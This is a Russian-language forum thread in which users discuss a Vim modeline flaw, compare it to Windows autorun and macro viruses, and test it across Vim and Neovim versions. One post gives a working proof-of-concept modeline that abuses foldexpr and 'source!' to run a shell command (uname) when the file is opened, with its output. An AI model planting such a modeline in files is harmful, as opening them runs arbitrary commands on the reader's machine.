Уязвимость в vim

ХЗ, проверь. Добавь в конфиг это и проверь

Получается уязвимость не в коде, а в настройках юзера. Т.е. это тоже самое, что отключить UAC в вин 8+... (про антивири молчу)
Да и вообще - вспомните макровирусы под МСофис

Ну он же пишет, что это не уязвимость, это фича, я и подумал.

аха, я помню, как достижение рассказывали, что в Wine наонкец-то заработали некоторые вендовирусы ;-)

ну эт действительно фишка. просто сделанная по принципу дебил - для дебилов, «система Витязь - я сделал, а вы - любитесь»

хз в общем, у меня tiny стоит, может в этом дело:

#vim.tiny -u .vimrc SW/vim.bug тупо открывает тот шаблон как текст

Эта «фишка» имела смысл во времена эпохи мульимедийных компьютеров, когда на CD-ROM физически нельзя было писать. Распространение её на перезаписываемые носители стало штатной уязвимостью, официальным каналом распространения вирусни.

Wine позволял запускать Klez в 2002-м году ;-)

Напиши команду чтобы в файл сохраняла. Что как маленький?

не прав. у него своя ниша. просто должно было всплывать окно. сопсна UAC этим потом и занялся. я не собираюсь быть адвокатом дьявола эээ мелкомягких, просто определённый смысл в этом были есть.

хз, я сильно этим вопросом не интересовался, тем более что не помню, что такое было это «klez». но вот что большая часть вирья тупо обламывалось на вайне - это я помню.

Vim 8.1.1186

$ cat script.vim
#!/usr/bin/env vim

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

$ chmod +x script.vim
$ ./script.vim

Linux ASUS-A52F 5.0.7-arch1-1-ARCH #1 SMP PREEMPT Mon Apr 8 10:37:08 UTC 2019 x86_64 GNU/Linux

Press ENTER or type command to continue
Linux ASUS-A52F 5.0.7-arch1-1-ARCH #1 SMP PREEMPT Mon Apr 8 10:37:08 UTC 2019 x86_64 GNU/Linux

Press ENTER or type command to continue
Linux ASUS-A52F 5.0.7-arch1-1-ARCH #1 SMP PREEMPT Mon Apr 8 10:37:08 UTC 2019 x86_64 GNU/Linux

Press ENTER or type command to continue

А если нажать ENTER и затем нажать o в загрузившемся после исполнения «скрипта» редакторе, то можно очень сильно удивиться :D

А никто не пробовал накатывать VIM на PowerShell? Есть какая-то приблуда на офф-сайте с https-ом но приблуда неподписана и кажись ClamAV на него ругается на VirusTotal-e, что троян для винды там (если мне мозжечок не изменяет).

Назови софт, который такой фичей пользовался. Кроме вирусов 😁

у тебя возможно сборка не из master, там все работает

 ~  vim -v
NVIM v0.3.7
Build type: Release
...

 ~  apt policy neovim
neovim:
  Установлен: 0.3.7-1~ppa1~ubuntu16.04.6
  Кандидат:   0.3.7-1~ppa1~ubuntu16.04.6
  Таблица версий:
 *** 0.3.7-1~ppa1~ubuntu16.04.6 500
        500 http://ppa.launchpad.net/neovim-ppa/stable/ubuntu xenial/main amd64 Packages
        100 /var/lib/dpkg/status

сразу с ходу первое что в голову пришло: 3G свистки

3G свистки Readonly, как и CD/DVD.

и какая связь между автозапуском и может ли устройство писать?

Ты сейчас серьёзно тупишь или просто троллишь?